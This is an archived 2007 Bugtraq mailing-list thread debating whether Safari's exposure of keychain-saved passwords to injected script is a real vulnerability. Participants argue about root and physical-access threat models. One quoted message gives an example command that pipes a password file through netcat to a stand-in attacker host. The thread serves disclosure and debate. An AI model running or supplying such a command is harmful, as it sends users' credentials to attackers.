[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-Id: <63902D0E-C08F-4DD6-88EB-768FC322C65C@digitalmunition.com>
Date: Fri, 18 May 2007 13:13:53 -0400
From: "Kevin Finisterre (lists)" <kf_lists@...italmunition.com>
To: poplix <poplix@...uasia.org>
Cc: bugtraq@...urityfocus.com
Subject: Re: Apple Safari on MacOSX may reveal user's saved passwords
Make this javascript for Safari show me the saved key for another
application (Like a stored WEP key) and I'll be impressed.
-KF
On May 18, 2007, at 9:23 AM, poplix wrote:
> On 17 May 2007, at 7:50 PM, graham.coles@...-logic-group.com wrote:
>
>> It is also why I don't leave my machine logged in and accessible
>> to other
>> users, which appears to be the whole basis of this 'vulnerability'.
>
> this is NOT the basis of the vulnerability. The point is that
> normally a malicious applications running as a nonroot are not
> able to read keychained passwords.
> In this case to steal passwords is sufficent to entice the victim
> to execute a malicious script, that normally it's not enough since
> keychain refuses access to untrusted applications.
> This issue exposes keychained password as those are saved in a text
> file: an inexperienced user can loose his password by executing an
> untrusted malicious shell script (ie "cat /home/pop/pass | nc
> steal.com 666")
>
>
>
>>
>> The whole concept of the keychain, however, is to restrict access
>> to its
>> contents to the owner. If you can happily log in as the owner,
>> then you
>> have everything they can access, INCLUDING the keychain. If they
>> can't do
>> this, you just have some encrypted data. You don't HAVE to store web
>> passwords, of course.
>
> keychain asks for password when the owner wants to see his data and
> having access to a computer doesn't mean that you have the login
> password too
>
>
>> If you are sitting at the machine of a person who has left it
>> logged in
>> and they use this feature, then whatever web browser you are using
>> will
>> believe you are that person and provide access to the website
>> automatically--you don't need to see the password to use it.
>
> and what if you gain a 5 minutes access to a laptop in the middle
> of the desert where internet connection is missing . . .
>
>
>>
>> I'd like to know what Apple were supposed to do to fix this?
>
> i think it's sufficent to untrust the injected code....
>
>
>>
>> It is, after all, YOUR keychain with YOUR passwords that YOU want
>> applications to recover when YOU are logged in. Why shouldn't YOU
>> be able
>> to access it. If you don't want to use it don't, but if someone
>> has to be
>> logged in as you to read it, that sounds about right.
>
> right?? it's like having passwords saved in a text file and 'chmod
> 700' it
>
>
>>
>>>> Someone has *ROOT* access to your system REMOTELY over ssh and
>>>> you're
>>>> worried that they might be able to retrieve a password from your
>> keychain.
>
> rooting a computer is really not the point, it' quite obvious that
> "rooted comp" => "TOTAL compromise"
>
>
>
> Let me make a question: what if safari makes loaded password part
> of the html so it's shown when clicking "view page source" ..??
> should it be considered a vulnerability??
>
>
> cheers,
> -poplix
>
>
>
>
>
>
>
>>
>>> Yes, it would be annoying if someone rooted my laptop. It would
>>> be a
>>> lot more annoying if they not only rooted my laptop but also
>>> cleaned out
>>> my bank account via my browser.
>>
>> 'Annoying' is the understatement of the millennium.
>>
>> As far as root access goes, see my comments above regarding key
>> loggers?
>>
>> With root access they will have your gpg file, they will know what
>> processes are running (they will know when you run gpg) and they can
>> capture your keystrokes. Is this then a vulnerability of gpg? So
>> much for
>> keeping your online banking safe. Even if you memorize the
>> passwords, they
>> can still see your keypresses and thereofre empty your bank account.
>>
>> If someone roots your machine, security is non-existant and trust
>> beyond
>> repair. Don't trivialize this by comparing it to a 'might be able
>> to see
>> your web passwords' issue, this is disaster incarnate and game
>> over all
>> rolled into one!
>
>>
>>> It *is* somewhat disturbing that root can so trivially interfere
>>> with
>>> the guts of someone else's processes. Normally, root has to do a
>>> lot of
>>> work to do that.
>>
>> With great power comes great responsibility, which is precisely
>> why Macs
>> have the root login disabled and require a user designated as
>> 'Administrator' to authenticate themself whenever system files are
>> modified or installed. Other users are created as non-
>> administrator and
>> remote login is blocked by the firewall. The chances of anyone
>> actually
>> logging in remotely as root on a normal Mac are zero as you, while
>> administrator, would have to specifically enable all of this. This
>> is why
>> Apple warn you not to do it.
>>
>>>>> a different non-root user on the console can do it too
>>>> Which again restricts this vunerability (as previously
>>>> mentioned) to
>> an
>>>> attacker who happens to be sitting in front of your machine(!)
>>
>>> Did you read the bit where I speculated about setuid applications?
>>
>> Yes, but again if you can get this far you either have the person's
>> identity or root access (bad or hopeless situation respectively). Why
>> worry incessantly about things that you stored in the keychain being
>> accessed when someone can access everything you own.
>>
>> Should the keychain refuse to divulge its contents to a person
>> authenticated as the owner?
>>
>> Is the answer to remove the keychain and watch as people revert to
>> storing
>> their passwords unencrypted in stickies, or text files on their
>> desktop?
>>
>> You normally have to come up with a feasible attack vector for
>> something
>> to be a vulnerability, this seems far too early to be notifying the
>> vendor.
>>
>> Saving passwords on any web browser is a lousy idea from a security
>> perspective. However, people don't like security, they like
>> convenience.
>> The only real fix here is perhaps a disclaimer message advising
>> people not
>> to store important passwords for websites in the browser in the first
>> place. But lets face reality, even if the did would it stop people
>> doing
>> it?
>>
>
>
>
>
>
>>> --
>>> David Cantrell
>>
>> --
>> Graham Coles
>>
>>
>>
>> The Logic Group Enterprises Limited
>> Logic House, Waterfront Business Park, Fleet Road, Fleet,
>> Hampshire, GU51 3SB, UK
>> Registered in England. Registered No. 2609323
>
Powered by blists - more mailing lists